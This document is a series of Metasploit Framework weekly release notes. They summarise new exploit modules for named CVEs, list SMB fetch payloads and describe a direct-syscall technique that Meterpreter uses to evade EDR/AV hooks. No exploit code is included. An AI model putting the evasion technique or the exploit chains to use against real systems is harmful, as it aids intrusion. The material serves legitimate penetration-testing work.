Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.

Authors: BobTheShopLifter and Thingstad and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18700 contributed by h00die-gr3y
Path: linux/http/kafka_ui_unauth_rce_cve_2023_52251
AttackerKB reference: CVE-2023-52251

Description: This PR adds an exploit module for a command injection vulnerability that exists in Kafka-ui between v0.4.0 and v0.7.1 that allows an attacker to inject and execute arbitrary shell commands via the groovy filter parameter at the topic section.

QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi

Authors: Spencer McIntyre, jheysel-r7, and sfewer-r7
Type: Exploit
Pull request: #18832 contributed by sfewer-r7
Path: linux/http/qnap_qts_rce_cve_2023_47218
AttackerKB reference: CVE-2023-47218

Description: The PR adds a module targeting CVE-2023-47218, an unauthenticated command injection vulnerability affecting QNAP QTS and QuTH Hero devices. CVE-2023-47218 was discovered and disclosed by Stephen Fewer.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

• #18125 from JustAnda7 - This PR adds a module to launch an LDAP service supporting capture and storage of Simple Authentication attempts. When launching this module with default options users must have permissions to bind to port 389.
• #18681 from h00die - This PR updates the pre-existing apache_ofbiz_deserialization module to include functionality that will bypass authentication by using the newly discovered auth-bypass vulnerability: CVE-2023-51467.

Enhancements and features (8)

• #18376 from JustAnda7 - This PR adds support for LDAP capture of NTLM authentication and adds a default implementation for LDAP BindRequest, SearchRequest, UnbindRequest, as well as a default action for unsupported requests.
• #18817 from dwelch-r7 - This PR adds support to now bucket module options that are output after running the options command. This will be for modules that support either an RHOST or a SESSION connection to show that only one or the other is required when using the new session type features for SMB/MSSQL/MYSQL/PostgreSQL sessions.
• #18847 from sjanusz-r7 - This PR adds proxy support for getting a PostgreSQL session via the postgres_login module.
• #18848 from sjanusz-r7 - This PR adds proxy support for getting a MSSQL session via the mssql_login module.
• #18854 from sjanusz-r7 - This PR adds proxy support for getting a MySQL session via the mysql_login module.
• #18855 from sjanusz-r7 - This PR removes the cwd convention from SQL-based sessions, and instead uses a more appropriate def database_name computed value rather than a cached variable.
• #18863 from sjanusz-r7 - This PR adds in the ENVCHANGE types to the MSSQL client mixin, and uses those to fetch the initial DB name received from the server.
• #18864 from cgranleese-r7 - Adds an alias for ls and dir inside SMB sessions.

Bugs fixed (5)

• #18770 from dwelch-r7 - Fixes a bug when multiple new session types (SMB, PostgreSQL, MSSQL, MySQL) were enabled with the features set postgresql_session_type true command.
• #18842 from upsidedwn - Updates the Metasploit Dockerfile to correctly honor user provided bundler config arguments.
• #18850 from adfoster-r7 - Fixes failing ldap server tests.
• #18861 from cgranleese-r7 - Removes SessionType values from modules with OptionalSession mixin.
• #18871 from adfoster-r7 - Fixes a crash when using the webconsole.

Documentation added (1)

• #18857 from jlownie - Updates the Wiki documentation on running the Metasploit database to be more clear.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.56...6.3.57
• Full diff 6.3.56...6.3.57

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New Fetch Payload

It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32 which has the added benefit of capturing the NetNTLM hashes of the requestor.

This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.

As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.

New module content (2)

Base64 Command Encoder

Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner

Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.

SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager

Authors: Spencer McIntyre, bwatters-r7, and sf stephen_fewer@harmonysecurity.com
Type: Payload (Adapter)
Pull request: #18664 contributed by zeroSteiner

Description: This adds an SMB fetch-payload service and a new payload to use it. The payload invokes rundll32 but handles everything for the user automatically.

This adapter adds the following payloads:

• cmd/windows/smb/x64/custom/bind_ipv6_tcp
• cmd/windows/smb/x64/custom/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/custom/bind_named_pipe
• cmd/windows/smb/x64/custom/bind_tcp
• cmd/windows/smb/x64/custom/bind_tcp_rc4
• cmd/windows/smb/x64/custom/bind_tcp_uuid
• cmd/windows/smb/x64/custom/reverse_http
• cmd/windows/smb/x64/custom/reverse_https
• cmd/windows/smb/x64/custom/reverse_named_pipe
• cmd/windows/smb/x64/custom/reverse_tcp
• cmd/windows/smb/x64/custom/reverse_tcp_rc4
• cmd/windows/smb/x64/custom/reverse_tcp_uuid
• cmd/windows/smb/x64/custom/reverse_winhttp
• cmd/windows/smb/x64/custom/reverse_winhttps
• cmd/windows/smb/x64/encrypted_shell/reverse_tcp
• cmd/windows/smb/x64/encrypted_shell_reverse_tcp
• cmd/windows/smb/x64/exec
• cmd/windows/smb/x64/loadlibrary
• cmd/windows/smb/x64/messagebox
• cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp
• cmd/windows/smb/x64/meterpreter/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/meterpreter/bind_named_pipe
• cmd/windows/smb/x64/meterpreter/bind_tcp
• cmd/windows/smb/x64/meterpreter/bind_tcp_rc4
• cmd/windows/smb/x64/meterpreter/bind_tcp_uuid
• cmd/windows/smb/x64/meterpreter/reverse_http
• cmd/windows/smb/x64/meterpreter/reverse_https
• cmd/windows/smb/x64/meterpreter/reverse_named_pipe
• cmd/windows/smb/x64/meterpreter/reverse_tcp
• cmd/windows/smb/x64/meterpreter/reverse_tcp_rc4
• cmd/windows/smb/x64/meterpreter/reverse_tcp_uuid
• cmd/windows/smb/x64/meterpreter/reverse_winhttp
• cmd/windows/smb/x64/meterpreter/reverse_winhttps
• cmd/windows/smb/x64/meterpreter_bind_named_pipe
• cmd/windows/smb/x64/meterpreter_bind_tcp
• cmd/windows/smb/x64/meterpreter_reverse_http
• cmd/windows/smb/x64/meterpreter_reverse_https
• cmd/windows/smb/x64/meterpreter_reverse_ipv6_tcp
• cmd/windows/smb/x64/meterpreter_reverse_tcp
• cmd/windows/smb/x64/peinject/bind_ipv6_tcp
• cmd/windows/smb/x64/peinject/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/peinject/bind_named_pipe
• cmd/windows/smb/x64/peinject/bind_tcp
• cmd/windows/smb/x64/peinject/bind_tcp_rc4
• cmd/windows/smb/x64/peinject/bind_tcp_uuid
• cmd/windows/smb/x64/peinject/reverse_named_pipe
• cmd/windows/smb/x64/peinject/reverse_tcp
• cmd/windows/smb/x64/peinject/reverse_tcp_rc4
• cmd/windows/smb/x64/peinject/reverse_tcp_uuid
• cmd/windows/smb/x64/pingback_reverse_tcp
• cmd/windows/smb/x64/powershell_bind_tcp
• cmd/windows/smb/x64/powershell_reverse_tcp
• cmd/windows/smb/x64/powershell_reverse_tcp_ssl
• cmd/windows/smb/x64/shell/bind_ipv6_tcp
• cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/shell/bind_named_pipe
• cmd/windows/smb/x64/shell/bind_tcp
• cmd/windows/smb/x64/shell/bind_tcp_rc4
• cmd/windows/smb/x64/shell/bind_tcp_uuid
• cmd/windows/smb/x64/shell/reverse_tcp
• cmd/windows/smb/x64/shell/reverse_tcp_rc4
• cmd/windows/smb/x64/shell/reverse_tcp_uuid
• cmd/windows/smb/x64/shell_bind_tcp
• cmd/windows/smb/x64/shell_reverse_tcp
• cmd/windows/smb/x64/vncinject/bind_ipv6_tcp
• cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid
• cmd/windows/smb/x64/vncinject/bind_named_pipe
• cmd/windows/smb/x64/vncinject/bind_tcp
• cmd/windows/smb/x64/vncinject/bind_tcp_rc4
• cmd/windows/smb/x64/vncinject/bind_tcp_uuid
• cmd/windows/smb/x64/vncinject/reverse_http
• cmd/windows/smb/x64/vncinject/reverse_https
• cmd/windows/smb/x64/vncinject/reverse_tcp
• cmd/windows/smb/x64/vncinject/reverse_tcp_rc4
• cmd/windows/smb/x64/vncinject/reverse_tcp_uuid
• cmd/windows/smb/x64/vncinject/reverse_winhttp
• cmd/windows/smb/x64/vncinject/reverse_winhttps

Enhancements and features (7)

• #18706 from sjanusz-r7 - Updates multiple PostgreSQL modules to now work with PostgreSQL sessions. This functionality is behind a feature flag which can be enabled with features set postgres_session_type true.
• #18747 from zgoldman-r7 - Updates the auxiliary/scanner/mssql/mssql_login module with a new CreateSession option which controls the opening of an interactive MSSQL session. This functionality is currently behind a feature flag which can be enabled with features set mssql_session_type true.
• #18759 from cgranleese-r7 - Updates the multiple MySQL modules to work with a provided MySQL session instead of opening a new connection. This functionality is behind a feature flag which can be enabled with features set mysql_session_type true.
• #18763 from zgoldman-r7 - Updates multiple MSSQL modules to now work with the new MSSQL session type that is enabled with features set mssql_session_type true.
• #18806 from cgranleese-r7 - Improves unknown command handling by suggesting similar valid commands.
• #18809 from zeroSteiner - Makes multiple improvements to the dns command - a new command which mimics the functionality of /etc/resolv.conf and /etc/hosts. This functionality is currently behind a feature flag which can be enabled with features set dns_feature true in msfconsole.
• #18825 from cgranleese-r7 - Improves the error messages when the current session is not compatible with a post module.

Bugs fixed (13)

• #18616 from adfoster-r7 - This fixes an issue with the AARCH64 SO ELF template that was causing SIGBUS exceptions to be raised.
• #18774 from adfoster-r7 - Updates the following modules to now work with newer versions of sqlcmd:
  post/windows/gather/credentials/mssql_local_hashdump and post/windows/manage/mssql_local_auth_bypass.
• #18786 from lihe07 - This fixes an option name collision between the exploit/linux/local/service_persistence when the payload is set to cmd/unix/reverse_netcat. The option to set the writable path is now BACKDOOR_PATH.
• #18795 from cgranleese-r7 - Moves the CreateSession option from advanced into basic options for modules, in order to increase discoverability.
• #18798 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move module's check method that was causing version comparisons to fail.
• #18799 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2020_17136 module's check method that was causing version comparisons to fail.
• #18800 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2021_40449 module's check method that was causing version comparisons to fail.
• #18801 from upsidedwn - This fixes an issue in the exploit/windows/local/cve_2022_26904_superprofile module's check method that was causing version comparisons to fail.
• #18812 from adfoster-r7 - Reverts the auxiliary/scanner/mssql/mssql_login modules's TDSENCRYPTION default value to false.
• #18813 from adfoster-r7 - Fixes a crash when running the help services or help hosts commands.
• #18823 from cdelafuente-r7 - Fix module metadata platform list comparison.
• #18826 from dwelch-r7 - Fixes a regression where the windows/smb/psexec module was not correctly performing cleanup logic.
• #18828 from dwelch-r7 - Fixes a crash when exploit modules used nops.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.55...6.3.56
• Full diff 6.3.55...6.3.56

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Go go gadget Fortra GoAnywhere MFT Module

This Metasploit release contains a module for one of 2024's hottest vulnerabilities to date: CVE-2024-0204. The path traversal vulnerability in Fortra GoAnywhere MFT allows for unauthenticated attackers to access the InitialAccountSetup.xhtml endpoint which is used during the products initial setup to create the first administrator user. After setup has completed, this endpoint is supposed to be no longer available. Attackers can use this vulnerability to create a user with Administrator privileges. Once Administrative privileges have been obtained for the GoAnywhere MFT application, uploading a .jsp payload in order to achieve RCE is trivial.

New module content (3)

runc (docker) File Descriptor Leak Privilege Escalation

Authors: Rory McNamara and h00die
Type: Exploit
Pull request: #18780 contributed by h00die
Path: linux/local/runc_cwd_priv_esc

Description: This adds a local privilege escalation exploit that leverages an internal file descriptor leak in runc versions prior to 1.1.12. An attacker with docker privileges is able write an arbitrary file on the host file system with the permissions of runc (typically root). With this, the module uploads a payload, sets the execute and the SUID permissions to escalate privileges.

Cacti RCE via SQLi in pollers.php

Authors: Aleksey Solovev and Christophe De La Fuente
Type: Exploit
Pull request: #18769 contributed by cdelafuente-r7
Path: multi/http/cacti_pollers_sqli_rce

Description: This PR adds an exploit module which leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE.

Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

Authors: James Horseman, Zach Hanley, and sfewer-r7
Type: Exploit
Pull request: #18762 contributed by sfewer-r7
Path: multi/http/fortra_goanywhere_mft_rce_cve_2024_0204

Description: This pull request adds an exploit module for CVE-2024-0204 which is a path traversal vulnerability which results in unauthenticated RCE in Fortra GoAnywhere MFT. GoAnywhere MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.

Enhancements and features (3)

• #18696 from zgoldman-r7 - Introduces a standalone MSSQL client class that can be used in new contexts not tied to a specific module.
• #18718 from cgranleese-r7 - Updates the auxiliary/scanner/mysql/mysql_login.rb module to include a new CreateSession option that opens an interactive session. This functionality is currently behind a feature flag which can be enabled with features set mysql_session_type true.
• #18761 from dwelch-r7 - Adds a user notification that new modules support a CreateSession option. This functionality is currently behind a feature flag which can be enabled with the features command.

Bugs fixed (3)

• #18704 from dwelch-r7 - Fixes a bug with framework having 0 registered nop modules when the defer-module-loads feature was enabled.
• #18773 from sjanusz-r7 - Fixes an issue where Ctrl+Z and Ctrl+C when in the context of an interactive PostgreSQL shell prompt inside the PostgreSQL session type did work correctly.
• #18803 from dwelch-r7 - Fixes a crash when using exploit/multi/handler with an invalid payload name.

Documentation added (1)

• #18782 from ekalinichev-r7 - Updates our existing Windows installation documentation to mention that Administrator privileges are required when installing via our .msi package.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.54...6.3.55
• Full diff 6.3.54...6.3.55

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Shared RubySMB Service Improvements

This week’s updates include improvements to Metasploit Framework’s SMB server implementation: the SMB server can now be reused across various SMB modules, which are now able to register their own unique shares and files. SMB modules can also now be executed concurrently. Currently, there are 15 SMB modules in Metasploit Framework that utilize this feature.

New module content (2)

Mirth Connect Deserialization RCE

Authors: Naveen Sunkavally, Spencer McIntyre, and r00t
Type: Exploit
Pull request: #18755 contributed by zeroSteiner
Path: multi/http/mirth_connect_cve_2023_43208

Description: This PR adds an exploit module for Mirth Connect. Versions < 4.4.1 are vulnerable to CVE-2023-43208 and CVE-2023-37679, where the former is a patch bypass for the latter. In both cases, an attacker can execute an OS command in the context of the target service using a specially crafted HTTP request and Java deserialization gadget. A technical analysis of CVE-2023-37679 is available in AttackerKB.

Puppet Config Gather

Author: h00die
Type: Post
Pull request: #18628 contributed by h00die
Path: linux/gather/puppet

Description: This PR adds a post gather module to get Puppet configs and other sensitive files.

Enhancements and features (2)

• #18680 from zeroSteiner - This adds a service compatible with Rex::ServiceManager for SMB that can be shared among modules.
• #18742 from sjanusz-r7 - Enhances the post/multi/gather/memory_search with additional UX improvements such as outputting a list of matched processes that are being targeted, as well as improved error handling if the process architecture is not correct.

Bugs fixed (2)

• #18750 from adfoster-r7 - Updates the to_handler command for payload modules to support option overrides. The to_handler command is a convenient way of using multi/handler, setting the payload, and setting datastore options.
• #18760 from adfoster-r7 - Fixes an issue where Metasploit fails to start when resolv.conf cannot be found.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.53...6.3.54
• Full diff 6.3.53...6.3.54

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Direct Syscalls Support for Windows Meterpreter

Direct system calls are a well-known technique that is often used to bypass EDR/AV detection. This technique is particularly useful when dynamic analysis is performed, where the security software monitors every process on the system to detect any suspicious activity. One common way to do so is to add user-land hooks on Win32 API calls, especially those commonly used by malware. Direct syscalls are a way to run system calls directly and enter kernel mode without passing through the Win32 API.

This first implementation focuses on substituting the Win32 API calls used by the Reflective DLL Injection (RDI) library with Direct Syscalls to the corresponding Native API's. For example, VirtualAlloc has been substituted by a system call to ZwAllocateVirtualMemory. Since RDI is used everywhere by Meterpreter and its extensions, it was a very good candidate for this initial work.

The main difficulty is to find the correct syscall number since it is not the same across Windows versions. Also, EDR's usually hook the NTDLL native API, making the discovery of syscall numbers more challenging. The technique used for this is based on the assumption that the syscall numbers are assigned in a sequential order, starting from the number 0. If we look at how native API functions are stored in memory, the syscall number can be deduced from the position of the related native API function in memory. The technique consists in selecting the system call functions (Zw…) from ntdll.dll exports and sorting them in ascending order of their memory addresses. The syscall number of one given native API function is simply its index in this sorted list. This is very similar to the technique used by Halo's Gate.

Another improvement is to make sure the call to the syscall instruction is made through ntdll.dll. EDR/AV can monitor this and flag any system calls not coming from ntdll.dll as suspicious. This technique is directly taken from RecycledGate. Here, the complexity is that Meterpreter must be compatible with all Windows versions from WinXP to the most recent flavors. This implementation will take care of parsing ntdll.dll and get the correct trampoline address that will be used when the system call is executed.

This work is a first step and we expect more additions this year. The next step is to switch additional Win32 API requests that Meterpreter and its extensions make to their corresponding native API using Direct Syscalls. The long-term goal is to make Direct Syscalls a standard for any future Windows-based development (payload, exploit, etc.).

New module content (8)

GL.iNet Unauthenticated Remote Command Execution via the logread module.

Authors: DZONERZY, Unknown, and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18648 contributed by h00die-gr3y
Path: linux/http/glinet_unauth_rce_cve_2023_50445

Description: This PR adds an exploit module for a number of different GL.iNet network products. The module combines an authentication by-pass vulnerability (CVE-2023-50919) with an RCE (CVE-2023-50445) allowing the user to remotely obtain, without authentication, a Meterpreter session running in the context of the root user.

Ivanti Connect Secure Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18708 contributed by sfewer-r7
Path: linux/http/ivanti_connect_secure_rce_cve_2023_46805

Description: This PR adds an exploit chain that consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.

MajorDoMo Command Injection

Authors: Valentin Lobstein and smcintyre-r7
Type: Exploit
Pull request: #18630 contributed by Chocapikk
Path: linux/http/majordomo_cmd_inject_cve_2023_50917

Description: This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

Saltstack Minion Payload Deployer

Authors: c2Vlcgo and h00die
Type: Exploit
Pull request: #18626 contributed by h00die
Path: linux/local/saltstack_salt_minion_deployer

Description: This PR adds an exploit module which allows for a user who has compromised a host acting as a SaltStack Master to deploy payloads to the Minions attached to that Master.

Apache Commons Text RCE

Authors: Alvaro Muñoz, Gaurav Jain, and Karthik UJ
Type: Exploit
Pull request: #18638 contributed by errorxyz
Path: multi/http/apache_commons_text4shell

Description: Adds an exploit module for CVE-2022-42889 that targets web apps utilizing Apache Commons Text's (1.5-1.9) StringSubstitutor interpolator class in an insecure fashion.

Atlassian Confluence SSTI Injection

Authors: Harsh Jaiswal, Rahul Maini, and Spencer McIntyre
Type: Exploit
Pull request: #18734 contributed by zeroSteiner
Path: multi/http/atlassian_confluence_rce_cve_2023_22527

Description: This adds an exploit for CVE-2023-22527 which is an unauthenticated RCE in Atlassian Confluence. The vulnerability is due to an SSTI flaw that allows an OGNL expression to be evaluated. The result is OS command execution in the context of the service account.

PRTG CVE-2023-32781 Authenticated RCE

Author: Kevin Joensen kevin@baldur.dk
Type: Exploit
Pull request: #18568 contributed by ggisz
Path: windows/http/prtg_authenticated_rce_cve_2023_32781

Description: This PR adds a module leveraging CVE-2023-32781, an authenticated command injection vulnerability in PRTG versions 23.2.84.1566 and earlier. The result is command execution as SYSTEM.

Memory Search

Author: sjanusz-r7
Type: Post
Pull request: #18713 contributed by sjanusz-r7
Path: multi/gather/memory_search

Description: Adds a new multi/gather/memory_search module that can read memory of processes on Windows and Linux hosts with Meterpreter. Regular expressions can be used to find passwords/credentials, and glob patterns and PIDs can be used to identify target processes.

Enhancements and features (6)

• #17634 from adfoster-r7 - Reliability and stability notes that have been previously missing have been added to some modules.
• #18645 from jvoisin - This adds a way to get the Build ID from ld.so by using the 'perf' command. Before this module depended on the commands 'file' and 'readelf' being installed to get the Build ID.
• #18663 from sjanusz-r7 - Adds a new Postgres session type, which is current behind a feature flag that can be activated with: features set postgresql_session_type true. Example usage: use scanner/postgres/postgres_login followed by run postgres://postgres:password@127.0.0.1:9000/template1 createsession=true verbose=false.
• #18720 from zeroSteiner - This enhancement marks the existing Unix encoders as also being compatible with Linux. Previously, no encoder modules were marked as compatible with Linux, so users could not set bad character when using the new fetch payloads.
• #18735 from AleksaZatezalo - Adds additional module metadata to the exploits/windows/iis/iis_webdav_scstoragepathfromurl module.
• #18737 from zeroSteiner - This updates metasploit-payloads gem to 2.0.165 to pull in changes to support direct syscalls for Meterpreter on Windows. See this PR and this PR for details.

Bugs fixed (3)

• #18662 from dwelch-r7 - Fixes an edgecase where features set dns_feature true did not correctly parse a user's /etc/resolv.conf file if there were multiple nameservers present.
• #18712 from ekalinichev-r7 - Fixes a crash with Metasploit's REST api when calling /api/v1/modules?name=aux.
• #18746 from zeroSteiner - Fixes a module bug when using the generate OPTION=VALUE syntax. Previously, the module's datastore would be unintentionally updated with the new option value.

Documentation added (1)

• #18729 from poupapaa - This fixes a typo in Metasploit-Guide-SMB.md.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.52...6.3.53
• Full diff 6.3.52...6.3.53

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro